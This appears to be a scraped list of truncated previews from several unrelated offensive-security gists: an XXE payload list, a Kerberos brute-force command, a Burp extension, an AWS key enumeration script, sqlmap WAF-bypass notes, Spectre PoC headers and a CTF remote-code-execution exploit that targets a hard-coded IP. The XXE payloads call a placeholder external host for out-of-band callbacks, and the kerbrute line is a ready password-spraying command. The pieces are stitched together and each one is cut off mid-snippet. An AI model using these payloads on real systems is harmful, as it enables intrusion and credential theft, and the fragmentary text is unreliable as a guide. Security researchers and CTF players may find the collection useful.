Bootstrap < 3.4.1 || < 4.3.1
✔️ CSP strict-dynamic bypass
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
from threading import Thread | |
import time | |
class TrafficMagnet(burp.IProxyListener): | |
def __init__(self): | |
callbacks.registerProxyListener(self) | |
self._helpers = callbacks.getHelpers() | |
self._callbacks = callbacks | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
[+] Server is listening on 5001 | |
...pre-payoad: | |
...post-payoad: | |
...pre-payoad: d | |
...post-payoad: 3 | |
...pre-payoad: d3 | |
...post-payoad: d3 | |
...pre-payoad: d3a | |
...post-payoad: 0d3 | |
...pre-payoad: d3ad |
#!/bin/bash | |
# Written by Frans Rosén (twitter.com/fransrosen) | |
_debug="$2" #turn on debug | |
_timeout="20" | |
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
_aws_key="AKIA..." | |
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper=
parameter of sqlmap
.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests
view.
The scale is 0-5.
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |
''' | |
HITCON CTF Quals 2017 BabyFirst Revenge v2 exploit | |
Task was to leverage 4-byte shell command execution in PHP to full RCE | |
''' | |
from requests import get, post | |
URL = 'http://52.197.41.31/?' | |
print 'Reset all' |
This is src doc of my presentation on shibuya.xss #8 (2016-11-14)
The main topic is vulnerabilities related to url parser.